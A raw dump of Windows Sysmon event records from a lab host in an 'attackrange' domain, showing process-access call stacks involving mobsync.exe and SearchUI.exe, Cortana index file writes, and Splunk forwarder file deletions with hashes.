12:02:35.138{266CAFBE-646C-6064-1000-00000000AE01}11242344C:\Windows\system32\svchost.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.138{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.138{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.044{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:34.998{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:34.998{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.571{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.571{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.571{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.571{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000007742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.431{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3479826513C511EA7BEC6E3BCF7C5BB9,SHA256=8C77626711D0248FEF3D165B15B02692A2CC2321414AC71242C08769AFB7C101,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.275{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01CF40EFD4A523D38337FFF17BCE0547,SHA256=D0F45D5891AAD40E74E27D86A78552F1A40A7EDE1BD402FEF0614AF0A3938E91,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.213{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.213{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.213{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bc4b|C:\Windows\System32\Windows.Storage.dll+12db23|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.213{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bbe8|C:\Windows\System32\Windows.Storage.dll+12db04|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.213{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12cd6b|C:\Windows\System32\Windows.Storage.dll+12c245|C:\Windows\System32\Windows.Storage.dll+12c022|C:\Windows\System32\Windows.Storage.dll+12f28a|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.213{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.213{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60e40|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.197{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+5fb52|C:\Windows\System32\Windows.Storage.dll+60148|C:\Windows\System32\Windows.Storage.dll+19f723|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.197{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+19f828|C:\Windows\System32\Windows.Storage.dll+19f709|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x80000000000000007731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.197{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 11241100x80000000000000007730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.197{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c481c91e-779b-48ca-956c-ea5496485c96}\0.2.filtertrie.intermediate.txt2021-03-31 12:02:36.197 11241100x80000000000000007729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.197{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c481c91e-779b-48ca-956c-ea5496485c96}\0.1.filtertrie.intermediate.txt2021-03-31 12:02:36.197 11241100x80000000000000007728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.197{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c481c91e-779b-48ca-956c-ea5496485c96}\0.0.filtertrie.intermediate.txt2021-03-31 12:02:36.197 11241100x80000000000000007727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.150{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\Appssynonyms.txt2016-04-15 08:09:24.000 23542300x80000000000000007726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.150{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\Appssynonyms.txtMD5=08DBC67378AEDAA933C307D420E3A828,SHA256=A1123799CFB9F6C40E1637FFCD4235C320CFA4B424B58EA68AE3DFE67595793F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.135{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BB6FD426DEF86DAE14BB7D4B9B871D6,SHA256=2B8EBAAB63A5AA91720A25BF1A12967AA028B5312F0F641A2804FE2ECDE70C83,IMPHASH=00000000000000000000000000000000falsetrue 